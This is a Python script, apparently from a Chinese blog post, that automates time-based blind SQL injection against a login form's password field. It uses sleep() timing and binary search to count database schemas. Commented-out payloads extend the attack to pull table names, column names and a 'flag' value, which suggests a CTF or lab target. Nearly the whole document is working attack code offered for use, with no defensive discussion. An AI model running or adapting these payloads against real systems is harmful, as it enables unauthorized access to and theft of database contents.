import requests
import sys
import time
import pdb
class Injection():
def __init__(self):
self.url = ""
self.schemataNum=0
def InjectionSchemaNumber(self):
high = 30
low = 1
mid = (low + high) // 2
while high > low:
payload = f"1' or if((select count(schema_name) from information_schema.schemata)>{mid},sle
ep(5),0)-- +" #查库名
#payload = f"1'or if(ascii(substr((seleCt(group_concat(table_name))from(information_schema.
tables)where(table_schema)='note'),{i},1))>{mid},sleep(2),1)#" #查表名
#payload = f"1'or if(ascii(substr((seleCt(group_concat(column_name))from(information_schema
.columns)where(table_name)='users'),{i},1))>{mid},sleep(2),1)#" #查列名
#payload = f"1'or if(ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid},sleep(2),1)#"
#查数据
data = {
"uname":"admin",
"passwd":payload,
"submit":"Submit"
}
last = int(time.time())
try:
res = requests.post(self.url, data = data)
except Exception as e:
print(e)
finally:
now = int(time.time())
if now - last >5 :
low = mid
else :
high = mid
mid = (low + high) // 2
if mid==low and high-low==1:
#print("The Number of schema is {}".format(high))
self.schemataNum=high
#break
return
#print(low,mid)
self.schemataNum=mid
def Usage(self):
if len(sys.argv)!=2:
print('The number of parameter number not right')
print('Usage:python3 %s url '% sys.argv[0])
print("Example:python3 postInjection.py http://192.168.62.249/login.php username=admin&password=admin password")
sys.exit(-1)
self.url = sys.argv[1]
if __name__ == '__main__':
# pdb.set_trace()
inject = Injection()
inject.Usage()
inject.InjectionSchemaNumber()
print(inject.schemataNum)
标签:脚本,__,self,mid,high,low,print,post,注入 From: https://www.cnblogs.com/xiaoliyulixianji/p/17601682.html